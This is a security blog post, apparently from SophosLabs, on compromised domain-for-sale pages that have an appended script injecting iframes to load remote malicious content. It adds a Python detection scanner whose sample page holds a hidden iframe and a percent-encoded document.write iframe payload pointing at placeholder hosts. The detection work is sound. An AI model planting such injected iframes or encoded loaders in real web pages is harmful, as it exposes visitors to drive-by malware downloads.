Get a domain – get infected


Clearly shopping around for wedding venues is not the only activity to get you in trouble nowadays. Over the past few days SophosLabs have detected yet another slew of web pages that have been compromised to turn them into drive-by download sites. A batch of the sites affected are placeholders for several ‘attractive’ domain names that are for sale:

[Screenshot from one compromised site]

All the compromised pages have been modified to append a malicious script to the bottom of the file. When the page is viewed, the script writes an iframe into the page in order to load further malicious content from a remote server. Some pages appear to have been compromised multiple times, with additional iframe tags inserted before the script. An example compromised page is shown in the figure below – the top pane shows the decrypted script, the bottom pane the tail of the compromised page:

[SophosLabs source decryption tool]

The specific purpose of the attack is unknown at this time; the remote servers referenced are currently not responding. For now, be assured that the compromised pages were proactively blocked as Mal/ObfJS-H and the target servers are blocked by the WS1000.
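As an added illustration (not code from the original post or from SophosLabs' tooling), the following Python scanner applies the three observations above to a page on disk: content appended after the closing tag, a script that document.writes an iframe once its percent-encoding is decoded, and hidden iframe tags injected directly into the markup, and it lists the iframe hosts a site owner would want to block. The sample page and the `remote-a.invalid` / `remote-b.invalid` hostnames are constructed placeholders.

```python
import re
from urllib.parse import unquote, urlparse

# Constructed sample: a "domain for sale" placeholder page with an injected
# hidden iframe before the appended script, and a percent-encoded script
# appended after </html>, mirroring the pattern described in the post.
SAMPLE_PAGE = """<html><head><title>domain for sale</title></head>
<body><h1>This domain is for sale</h1>
<iframe src="http://remote-a.invalid/a" width="1" height="1" style="visibility:hidden"></iframe>
</body></html>
<script>document.write(unescape('%3Ciframe%20src%3D%22http%3A%2F%2Fremote-b.invalid%2Fb%22%20width%3D0%20height%3D0%3E%3C%2Fiframe%3E'))</script>
"""

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.I)
SRC_RE = re.compile(r'<iframe\b[^>]*?src\s*=\s*["\']?([^"\'\s>]+)', re.I)
HIDDEN_RE = re.compile(
    r'(width|height)\s*=\s*"?\s*[01]\b|visibility\s*:\s*hidden|display\s*:\s*none', re.I)


def scan_page(html: str) -> list:
    """Return a list of findings; an empty list means none of the heuristics fired."""
    findings = []
    # 1. Anything after the closing </html> tag is not part of a normal page.
    end = html.lower().rfind("</html>")
    if end != -1 and html[end + len("</html>"):].strip():
        findings.append("content appended after </html>")
    # 2. Scripts that write an iframe via document.write (decode %xx escapes first).
    for m in SCRIPT_RE.finditer(html):
        body = unquote(m.group(1))
        if "document.write" in body and "<iframe" in body.lower():
            findings.append("script writes an iframe")
    # 3. Hidden or 0x0/1x1 iframe tags injected directly into the markup.
    for m in IFRAME_RE.finditer(html):
        if HIDDEN_RE.search(m.group(0)):
            findings.append("hidden iframe: " + m.group(0))
    return findings


def iframe_targets(html: str) -> set:
    """Hosts referenced by iframes, including ones hidden in percent-encoded script text."""
    decoded = html + "".join(unquote(m.group(1)) for m in SCRIPT_RE.finditer(html))
    return {urlparse(m.group(1)).hostname for m in SRC_RE.finditer(decoded)} - {None}


if __name__ == "__main__":
    for finding in scan_page(SAMPLE_PAGE):
        print(finding)
    print("iframe hosts:", sorted(iframe_targets(SAMPLE_PAGE)))
```

Run it over the tail of each page under the web root; a clean page yields no findings, and the returned hosts are the candidates for a block list.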